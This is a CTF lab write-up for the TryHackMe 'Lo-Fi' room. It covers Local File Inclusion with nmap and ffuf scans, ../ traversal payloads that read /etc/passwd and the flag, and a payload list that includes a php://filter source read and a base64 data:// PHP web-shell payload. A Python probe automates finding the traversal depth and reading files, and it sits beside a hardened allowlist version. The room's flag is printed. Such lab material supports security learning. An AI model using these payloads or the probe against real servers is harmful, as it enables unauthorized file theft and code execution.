Want to hear some lo-fi beats, to relax or study to? We've got you covered! This TryHackMe room introduces Local File Inclusion (LFI) vulnerabilities and demonstrates how they can be exploited to read sensitive files from a web server.
We start with the standard Nmap scan to identify open ports and services on the target system.
nmap -A -T4 lo-fi.thm
The scan reveals ports and services running on the target. We'll focus on the web server for this challenge.
Clicking on one of the links from the scan results leads us to the main website:
http://lo-fi.thm/
Examining the URL structure, we notice a page parameter that controls which page the application loads:
http://lo-fi.thm/?page=
A user-controlled file name handed to an include call is a classic entry point for Local File Inclusion (LFI). There also appears to be a filter that rejects absolute paths, so relative directory traversal is the first thing to try.
To test for LFI, we use ffuf (Fuzz Faster U Fool) with a wordlist built specifically from LFI payloads. The -fl 124 option hides every response that has 124 lines, the length of the baseline page, so only payloads that change the output are shown:
ffuf -w /usr/share/wordlists/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt -u "http://lo-fi.thm/?page=FUZZ" -fl 124
Several payloads produce a different response, which indicates that the include is pulling in other files and that LFI is likely.
Let's test the simplest case first - attempting to include the system's passwd file:
http://lo-fi.thm/?page=../../../etc/passwd
Success! The page displays the contents of /etc/passwd, confirming the LFI vulnerability. Three levels of ../ were enough to reach the filesystem root from the web root (consistent with a document root three directories deep, such as /var/www/html), and because the traversal is relative, the absolute-path filter does not get in the way. We can now read any file the web server's user is allowed to open.
Now that we know LFI works, let's try to include the flag file mentioned in the challenge description. The flag should be located in the root directory of the system:
http://lo-fi.thm/?page=../../../flag.txt
Perfect! We have a hit. The page now displays the contents of the flag file:
Flag: flag{e4478e0eab69bd642b8238765dcb7d18}
As the challenge text puts it, we need to "climb the filesystem". The same traversal reads any other file the web server's user can access, so exploring further is a matter of knowing or guessing paths.
Local File Inclusion (LFI) is a web vulnerability that lets an attacker include files from the server's filesystem in the web application's response. It occurs when user input is passed to a file include (such as PHP's include) without validation, so the attacker chooses which file is opened.
Common LFI payloads include:
../../../etc/passwd - directory traversal out of the web root
php://filter/convert.base64-encode/resource=../../../etc/passwd - PHP filter wrapper; returns the file base64-encoded, which is how you read PHP source instead of having it executed
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4= - data wrapper; the base64 decodes to <?php system($_GET['cmd']);?> and gives code execution, but only when allow_url_include is enabled
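The traversal steps above and the payload list can be tied together in a small probe. What follows is an added example, not code from the original writeup or from the room: it models the vulnerable include against a constructed fake filesystem (assumed web root /var/www/html, a filter that only strips leading slashes, made-up file contents and a placeholder flag), climbs one ../ at a time until /etc/passwd appears, reads the flag and the index.php source through php://filter, and contrasts that with an allowlisted include that the same probe cannot get past. http_fetch() is a hypothetical helper for pointing the probe at a live target; the module never contacts the network on its own.

```python
import base64
import binascii
import posixpath
import urllib.parse
import urllib.request
from typing import Callable, Optional, Tuple

# Constructed stand-in for the target (assumptions: web root /var/www/html, made-up
# file contents, placeholder flag). Nothing here is data taken from the room.
WEB_ROOT = "/var/www/html"
FAKE_FS = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                   "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n",
    "/flag.txt": "flag{constructed-example-flag}\n",
    "/var/www/html/index.php": "<?php include($_GET['page']); ?>\n",
    "/var/www/html/pages/home.html": "<h1>lo-fi beats</h1>\n",
}
PHP_FILTER = "php://filter/convert.base64-encode/resource="
Fetch = Callable[[str], str]


def vulnerable_include(page: str) -> str:
    """Models include($_GET['page']) behind a naive filter that only strips leading
    slashes (the 'absolute paths are blocked' behaviour). Relative traversal still
    resolves outside the web root, and php://filter returns the raw file base64-encoded."""
    wrapped = page.startswith(PHP_FILTER)
    if wrapped:
        page = page[len(PHP_FILTER):]
    resolved = posixpath.normpath(posixpath.join(WEB_ROOT, page.lstrip("/")))
    body = FAKE_FS.get(resolved)
    if body is None:
        return "Warning: include(): failed to open stream"
    return base64.b64encode(body.encode()).decode() if wrapped else body


def find_traversal_depth(fetch: Fetch, target: str, marker: str,
                         max_depth: int = 10) -> Optional[Tuple[int, str]]:
    """Climb one ../ at a time until `marker` (e.g. root:x:0:0) appears in the response.
    Returns (depth, payload) for the shallowest depth that works, or None."""
    for depth in range(max_depth + 1):
        payload = "../" * depth + target.lstrip("/")
        if marker in fetch(payload):
            return depth, payload
    return None


def read_file(fetch: Fetch, depth: int, target: str) -> str:
    """Read an arbitrary file once the traversal depth is known."""
    return fetch("../" * depth + target.lstrip("/"))


def read_php_source(fetch: Fetch, depth: int, target: str) -> str:
    """Read a .php file's source via php://filter so the server encodes it instead of
    executing it. Raises if the reply is not base64 (wrapper blocked or file missing)."""
    encoded = fetch(PHP_FILTER + "../" * depth + target.lstrip("/"))
    try:
        return base64.b64decode(encoded, validate=True).decode()
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError(f"not a base64 reply: {encoded[:60]!r}") from exc


ALLOWED_PAGES = {"home": "pages/home.html"}


def hardened_include(page: str) -> str:
    """Fixed version: the user value is a key into an allowlist, never a path, and the
    resolved path is still checked to lie under WEB_ROOT as defence in depth."""
    rel = ALLOWED_PAGES.get(page)
    if rel is None:
        return "404 not found"
    resolved = posixpath.normpath(posixpath.join(WEB_ROOT, rel))
    if not resolved.startswith(WEB_ROOT + "/"):
        return "404 not found"
    return FAKE_FS.get(resolved, "404 not found")


def http_fetch(base_url: str, param: str = "page") -> Fetch:
    """Hypothetical helper: build a fetch() for a live target, e.g. http_fetch("http://lo-fi.thm/")."""
    def fetch(payload: str) -> str:
        url = base_url + "?" + urllib.parse.urlencode({param: payload})
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.read().decode(errors="replace")
    return fetch


if __name__ == "__main__":
    fetch = vulnerable_include  # swap for http_fetch("http://lo-fi.thm/") against the real box
    hit = find_traversal_depth(fetch, "/etc/passwd", "root:x:0:0")
    print("traversal:", hit)
    if hit:
        depth = hit[0]
        print(read_file(fetch, depth, "/flag.txt"), end="")
        print(read_php_source(fetch, depth, "/var/www/html/index.php"), end="")
```

Against the fake target the probe stops at depth 3 with the payload ../../../etc/passwd, which is the same shape as the payloads used in the room; the absolute form /etc/passwd fails because the filter folds it back under the web root. Searching for the shallowest working depth rather than piling on ../ is deliberate: on a real target the marker check is what tells a successful include apart from an error page, and the depth you learn from /etc/passwd carries over to every other file.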